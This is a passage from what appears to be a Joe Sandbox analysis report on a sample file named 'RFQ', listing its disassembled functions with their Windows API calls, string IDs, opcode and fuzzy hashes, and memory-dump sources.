                                                                            • Opcode Fuzzy Hash: ed553573d6a94428410203fbfdf3fec6bdcda65e340c4f1f849d7a52fd73c353
                                                                            • Instruction Fuzzy Hash: 69F18C709083028FD725DF14C851B6AB7E2BFA4304F14892EF48A9B3A1D775ED46CB86
                                                                            Function 006F4CA5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00688FA0: _wcslen.LIBCMT ref: 00688FA5
                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 006F4DF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Connection_wcslen
                                                                            • String ID: *$LPT
                                                                            • API String ID: 1725874428-3443410124
                                                                            • Opcode ID: 9a55b9c87e4463bfd266f309d95a8acd28a125b9918f1a0e76562dfddbcd88fc
                                                                            • Instruction ID: a55e6491d93dca28e60139049e1ce082ac648346ff9826e97af783b77e811cd3
                                                                            • Opcode Fuzzy Hash: 9a55b9c87e4463bfd266f309d95a8acd28a125b9918f1a0e76562dfddbcd88fc
                                                                            • Instruction Fuzzy Hash: DC916F75A002089FCB14DF54C484EBABBF2BF84304F558099E90A9F762CB75EE86CB51
                                                                            Function 006AE20D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __startOneArgErrorHandling.LIBCMT ref: 006AE29D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorHandling__start
                                                                            • String ID: pow
                                                                            • API String ID: 3213639722-2276729525
                                                                            • Opcode ID: 433947ba52d5cb256ecf45e80192a5ae3cdc68472b1f8552e9242b2da81d574e
                                                                            • Instruction ID: 9d268eebd1498e072da25869cae58eeb84a9cd07c1ed28ef1832674c91183db8
                                                                            • Opcode Fuzzy Hash: 433947ba52d5cb256ecf45e80192a5ae3cdc68472b1f8552e9242b2da81d574e
                                                                            • Instruction Fuzzy Hash: 08515DA1A0C5059ADB117724C9023F93BAAAF81740F308D9DE095423A9DB36CDD39F8A
                                                                            Function 006828C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #
                                                                            • API String ID: 0-1885708031
                                                                            • Opcode ID: abc17b4c16bf4050562bb2f02db7f7f0416c2320af3b7545d1a551bfc5ba8496
                                                                            • Instruction ID: 5977199a17cc95cb7b71c8964796a2374ca9d81c9b31f2ed6a0a8123f077a1e5
                                                                            • Opcode Fuzzy Hash: abc17b4c16bf4050562bb2f02db7f7f0416c2320af3b7545d1a551bfc5ba8496
                                                                            • Instruction Fuzzy Hash: 7151EF7154424B9EDF15AF29C4A0AFA7BB2EF16310F24415EECA29B3D0DA749D42CB60
                                                                            Function 0069F370 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 0069F381
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0069F39A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: df86b00593b7c49a80d9721477ec1e38f8a7f53f46de899018d0daabd8aec82e
                                                                            • Instruction ID: 381ab707ecbc18a056bb56a4cbaddaf347adc328f6d84db0abc74edb4d0abbe9
                                                                            • Opcode Fuzzy Hash: df86b00593b7c49a80d9721477ec1e38f8a7f53f46de899018d0daabd8aec82e
                                                                            • Instruction Fuzzy Hash: 3D5148714187489BE360AF50D886BAFBBE8FF85340F81895DF1D951191DB318829CB6B
                                                                            Function 006FD012 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 006FD04E
                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006FD058
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_wcslen
                                                                            • String ID: |
                                                                            • API String ID: 596671847-2343686810
                                                                            • Opcode ID: 7cb6d8a58db17621d677e35c4415b26ff3fd9a6fb3ce3692b8803ee21c87eb54
                                                                            • Instruction ID: 3f85ecb65c2e6d26d7f7fbbb338aae78013aff91161427c43b4d7c89a090f9da
                                                                            • Opcode Fuzzy Hash: 7cb6d8a58db17621d677e35c4415b26ff3fd9a6fb3ce3692b8803ee21c87eb54
                                                                            • Instruction Fuzzy Hash: 46315B71800109AFCF41EFA4CC85AEEBFBAFF04300F004129F925A7266DB319A56CB60
                                                                            Function 0071349F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00713554
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0071358F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            • Opcode ID: 7fe4ac0b2486431446f4196f0a84780891a449f052963a9717e5ab833044c06d
                                                                            • Instruction ID: 3d51e9707a16b95e4d0120f1e185f823a0a5461ecfa7009fc432416cea452d9b
                                                                            • Opcode Fuzzy Hash: 7fe4ac0b2486431446f4196f0a84780891a449f052963a9717e5ab833044c06d
                                                                            • Instruction Fuzzy Hash: 69319E71100604AADB21DF78CC80AFB73BAFF48720F10861DF9A987180DA38ED91CB64
                                                                            Function 0071446C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00714554
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00714569
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 8e989b88bbee9692ed9dddc70e663c76a3f421c96fb41c2ec16f2874443e7f41
                                                                            • Instruction ID: 50a59c01bf9ab55039adc0e6a66c993a3c9fd533d15308559c6aac0d3f1d6e45
                                                                            • Opcode Fuzzy Hash: 8e989b88bbee9692ed9dddc70e663c76a3f421c96fb41c2ec16f2874443e7f41
                                                                            • Instruction Fuzzy Hash: 2F314A75A0030A9FDB14CFA9C890BDA7BB6FF08300F10416AE904AB391D774E991CF90
                                                                            Function 00707AE2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006A01C2: EnterCriticalSection.KERNEL32(0075070C,?,?,?,00691744,00752580,?,?,?), ref: 006A01CD
                                                                              • Part of subcall function 006A01C2: LeaveCriticalSection.KERNEL32(0075070C,?,00691744,00752580,?,?,?), ref: 006A020A
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006A0023: __onexit.LIBCMT ref: 006A0029
                                                                            • __Init_thread_footer.LIBCMT ref: 00707B22
                                                                              • Part of subcall function 006A0178: EnterCriticalSection.KERNEL32(0075070C,?,?,006D556E,00752540,?,?,?,?,?), ref: 006A0182
                                                                              • Part of subcall function 006A0178: LeaveCriticalSection.KERNEL32(0075070C,?,006D556E,00752540,?,?,?,?,?), ref: 006A01B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                            • String ID: Qdn$Variable must be of type 'Object'.
                                                                            • API String ID: 535116098-568107439
                                                                            • Opcode ID: d7913aa5833a6b5dd8ecd270416c8f29457b1166171bf460272b673e20666092
                                                                            • Instruction ID: a102887d058909483ece4becda1df4161233c94ebe83515b0fb2aed54dbfa3de
                                                                            • Opcode Fuzzy Hash: d7913aa5833a6b5dd8ecd270416c8f29457b1166171bf460272b673e20666092
                                                                            • Instruction Fuzzy Hash: AD31AC74A08204DFDB48EF54D891AAD7BF2AF09304F50815DE8055B3D2EBB9EE82CB55
                                                                            Function 00713122 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007131AF
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007131BA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: 695aeacf61ace3542da2bb2356519de282b3e3def1e2bb4ccd4635e8438dcd3b
                                                                            • Instruction ID: 04629108ec4167637e8416d723ef3c40b76726d882bd35bd40945ea01d867640
                                                                            • Opcode Fuzzy Hash: 695aeacf61ace3542da2bb2356519de282b3e3def1e2bb4ccd4635e8438dcd3b
                                                                            • Instruction Fuzzy Hash: 70118E7120060C7FEF259E58CC80EEB376BEB493A4F104129F9189B2D0D679AD9197A0
                                                                            Function 00713643 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006879B6: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006879F4
                                                                              • Part of subcall function 006879B6: GetStockObject.GDI32(00000011), ref: 00687A08
                                                                              • Part of subcall function 006879B6: SendMessageW.USER32(00000000,00000030,00000000), ref: 00687A12
                                                                            • GetWindowRect.USER32(00000000,?), ref: 007136AD
                                                                            • GetSysColor.USER32(00000012), ref: 007136C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            • Opcode ID: 395ddccf4ced43935f3d61c388ad893cd0cb4b131c26724ef31f965b1d41427c
                                                                            • Instruction ID: bb97520abb88d7d57645e8cc360216717316174485e4f8a10c89d3f22143836d
                                                                            • Opcode Fuzzy Hash: 395ddccf4ced43935f3d61c388ad893cd0cb4b131c26724ef31f965b1d41427c
                                                                            • Instruction Fuzzy Hash: 54112672610209AFDB01DFA8CC45AEA7BA8EB08354F104624F956E2290E679E890DB60
                                                                            Function 006FCC3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006FCC9B
                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006FCCC4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            • Opcode ID: aabe040ece79bc3b2a729a2eeb9c03aabc5dc82d27a4282f158268d5af2e8ba7
                                                                            • Instruction ID: 2b78eb7afb125178468ff98bea5ffad56cf5c635a78a6386ef75874259196154
                                                                            • Opcode Fuzzy Hash: aabe040ece79bc3b2a729a2eeb9c03aabc5dc82d27a4282f158268d5af2e8ba7
                                                                            • Instruction Fuzzy Hash: F611E97124163EB9D7384B668D49EF7BE9DEF127B4F004216B21D93180D3649841D6F0
                                                                            Function 0071335C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 007133DE
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007133ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            • Opcode ID: b14cbcb9b0eba79cb2fbfda6bdbbb749da7eee54f47d0ac16b392ec4b329f430
                                                                            • Instruction ID: a5449555eff9f122e900d0b5e321fe0e5cf5a51f7a78860bf4baabff12920b15
                                                                            • Opcode Fuzzy Hash: b14cbcb9b0eba79cb2fbfda6bdbbb749da7eee54f47d0ac16b392ec4b329f430
                                                                            • Instruction Fuzzy Hash: 3B118C71500208AFEF118EA8DC44AFB3B6AEB15374F608714F974971D0CB79EC919B64
                                                                            Function 006E6BDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 006E6C0C
                                                                            • _wcslen.LIBCMT ref: 006E6C18
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharUpper
                                                                            • String ID: STOP
                                                                            • API String ID: 1256254125-2411985666
                                                                            • Opcode ID: fd0f71300f09a27a10efe26a39f8ea38c144f24eeae794f8108d8da031ba8d00
                                                                            • Instruction ID: e14174d2e8a8a569c925cec7bd10eb197ef048c1ecbc268f5e9f1ef7ac041ee2
                                                                            • Opcode Fuzzy Hash: fd0f71300f09a27a10efe26a39f8ea38c144f24eeae794f8108d8da031ba8d00
                                                                            • Instruction Fuzzy Hash: C701E1325116668ACB10AEBECC849BF77A6EA71B507200528F8A197290EB70D8018654
                                                                            Function 006E1C22 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006E3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 006E3C12
                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006E1C90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 624084870-1403004172
                                                                            • Opcode ID: e7c01c7e9edfc527263dbfad71af0cd4fcb445430a303944cf99836c792d68ff
                                                                            • Instruction ID: 6099ac2cca7852397db14102066309792227c669d7cd47878344b14e7a60651b
                                                                            • Opcode Fuzzy Hash: e7c01c7e9edfc527263dbfad71af0cd4fcb445430a303944cf99836c792d68ff
                                                                            • Instruction Fuzzy Hash: 3D0122B0A522646B8B04EBA6CC558FE336AAF063507100609E8339B3C1EA349809D724
                                                                            Function 006E1B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006E3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 006E3C12
                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 006E1B8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 624084870-1403004172
                                                                            • Opcode ID: 3ca5ac6522c7d876fd83c5521c09f9b144934a90f2b8ef7d9480b929f42fa851
                                                                            • Instruction ID: e08f994cb153800738f28c7104aff1c09d3953116a0b57cb6cf4199ea30ed14d
                                                                            • Opcode Fuzzy Hash: 3ca5ac6522c7d876fd83c5521c09f9b144934a90f2b8ef7d9480b929f42fa851
                                                                            • Instruction Fuzzy Hash: 1201F7B1A422486BCB14FBA2C865EFE73AA8F16380F100059F4027B381FB609E09D775
                                                                            Function 006E1BA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006E3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 006E3C12
                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 006E1C0C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 624084870-1403004172
                                                                            • Opcode ID: ed2a626e5807e5f07e7c7d4f93ca7cfe99ecb32e1f2c18dd6713a14ed6528953
                                                                            • Instruction ID: 62d43a99266ce184fc42eaa10a6b0b56f080a928123bdc5a4daee49ed6a38473
                                                                            • Opcode Fuzzy Hash: ed2a626e5807e5f07e7c7d4f93ca7cfe99ecb32e1f2c18dd6713a14ed6528953
                                                                            • Instruction Fuzzy Hash: F801A7B5B8224867CB14FBA6C9559FE73AA8B12740F101059B402BB382EA658E099775
